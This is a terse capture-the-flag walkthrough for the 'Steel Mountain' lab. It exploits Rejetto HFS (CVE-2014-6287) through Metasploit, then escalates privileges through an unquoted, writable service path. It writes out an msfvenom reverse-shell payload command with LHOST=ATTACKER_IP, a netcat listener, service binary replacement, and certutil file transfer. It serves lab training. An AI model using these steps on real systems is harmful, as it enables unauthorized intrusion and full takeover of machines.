Steel Mountain

Tasks:

1. Introduction:
   1. Just visit ip in browser and reverse image search in google after downloading picture - Bill Harper
2. Initial Access:
   1. Do nmap -sC -sV -T5 ip and answer the question, visit 8080 port we get server is running rejetto http file server version 2.3
   2. Search Exploit-DB for rejetto and find CVE - CVE-2014-6287
   3. Search in msfconsole for exploit , use exploit/windows/http/rejetto_hfs_exec, set RHOSTS and PORT details of victim and run to gain meterpreter shell, use shell ,to switch to cmd and go to bill's desktop , find user.txt and submit.
3. Privilege Escalation:
   1. upload PowerUp.ps1 from meterpreter.
   2. load powershell and type powershell_shell to get powershell.
   3. Execute ./PowerUp.ps1 and run Invoke-AllChecks - AdvancedSystemCareService9 is unquoted service with writable permission, stop the service using sc stop AdvancedSystemCareService9.
   4. Generate malicious exe with msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=1337 -f exe -o ASCService.exe
   5. Copy the the malicious binary to victim machine and replace in service path.
   6. Start netcat listener in attacker machine - nc -nvlp 1337
   7. Start service in victim machine using sc start AdvancedSystemCareService9
   8. Check netcat terminal - You have root access, go to Administrator desktop , find root.txt and submit root flag !!!.
4. Access and Escalation Without Metasploit:
   1. Instead of using meterpreter use exploit-db code, host ncat.exe in port 80 using python simple httpserver and gain shell .
   2. Copy winPEAS binary to victim using certutil or any other technique and run - You will get same result that AdvancedSystemCareService9 is unquoted service with writable permission
   3. Now proceed from msvenom payload generation as done in task 3 to get root.
   4. Get-Service is used to find service names.